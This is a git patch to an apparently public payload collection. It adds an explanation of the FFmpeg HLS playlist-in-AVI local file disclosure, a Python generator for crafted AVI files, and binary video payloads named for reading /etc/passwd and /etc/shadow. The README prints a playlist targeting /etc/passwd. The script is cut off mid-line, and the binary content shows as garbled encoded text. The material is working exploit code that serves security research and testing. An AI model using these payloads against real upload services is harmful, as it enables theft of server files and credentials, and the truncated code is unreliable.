From ab63a537e73a4e195454357137540aed17ce9fa3 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Wed, 28 Jun 2017 22:45:36 +0200
Subject: [PATCH] FFMpeg injection - Bypass and explanation

---
 Upload insecure files/Ffmpeg HLS/README.md | 22 ++++++++++
 .../Ffmpeg HLS/gen_avi_bypass.py | 38 ++++++++++++++++++
 .../Ffmpeg HLS/read_passwd_bypass.mp4 | Bin 0 -> 10761 bytes
 .../Ffmpeg HLS/read_shadow_bypass.mp4 | Bin 0 -> 10761 bytes
 4 files changed, 60 insertions(+)
 create mode 100644 Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
 create mode 100644 Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4
 create mode 100644 Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4

diff --git a/Upload insecure files/Ffmpeg HLS/README.md b/Upload insecure files/Ffmpeg HLS/README.md
index e8f5b85..9d33035 100644
--- a/Upload insecure files/Ffmpeg HLS/README.md
+++ b/Upload insecure files/Ffmpeg HLS/README.md
@@ -10,7 +10,29 @@ FFmpeg is an open source software used for processing audio and video formats. Y
 5. If you are lucky, you'll the content of `` from the server.
 ```
 
+## How it works (Explanations from neex - Hackerone links)
+the script creates an AVI that contains an HLS playlist inside GAB2. The playlist generated by this script looks like this:
+```
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:1.0
+GOD.txt
+#EXTINF:1.0
+/etc/passwd
+#EXT-X-ENDLIST
+```
+To process a playlist ffmpeg concatenates all segments and processes it as single file.
+To determine the type of this file FFmpeg uses the first segment of the playlist.
+FFmpeg processes .txt files in a special way. It tries to show a screen capture of a tty printing this file.
+
+So, the playlist above will be processed as follows:
+FFmpeg sees #EXTM3U signature inside GAB2 chunk and determines file type as HLS playlist.
+The file GOD.txt doesn't even exist, but it's name is enough for FFmpeg to detect file type as .txt.
+FFmpeg concatenates the contents of all segments of the playlist. As only one of two segments actually exists, the result of concatenation is just the contents of the file we want to retrieve.
+Because the type of this concatenation is .txt, FFmpeg draws a tty that prints the file.
+
 ## Thanks to
 * [Hackerone - Local File Disclosure via ffmpeg @sxcurity](https://hackerone.com/reports/242831)
+* [Hackerone - Another local file disclosure via ffmpeg](https://hackerone.com/reports/243470)
 * [PHDays - Attacks on video converters:a year later, Emil Lerner, Pavel Cheremushkin](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
 * [Script by @neex](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py)
diff --git a/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py b/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
new file mode 100644
index 0000000..2aea429
--- /dev/null
+++ b/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
@@ -0,0 +1,38 @@ +import struct +import argparse + +AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" + + +def make_txt_packet(content, fake_packets=50, fake_packet_len=200): + content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content + packet = b'00tx' + struct.pack('3*%YvQ1Tz^RMrWU<%UL~4XW>PSEX2}VO3WN~ouS2*x<{2BZd zzr!{`wr}~O$$QD=yMDd*-s}6c69s{y;q@cuCh8`86{W_b*>o_Uj4!Bv`Dx$&j2e}< zV!cz;71d?2-YoX4oElj^o6=mLl`ryabB|qRof! zGx3#i^|~L$fqUA}C*`KrePTLZ92(cr)$rDD&=>vQ*nG%`&6h!zy^czeiG6z^tw+PJ zt&9HWM|{uUrUyRYBbfmHH_5d5Uf{#eOi}?pl41D4?i3*%YvQ1Tg;N*9WU)tWA~ixGbtIrE35J9=$l~DQuW;b!_%r%b z{0>WkY~S)lllPL#cl~1D4?i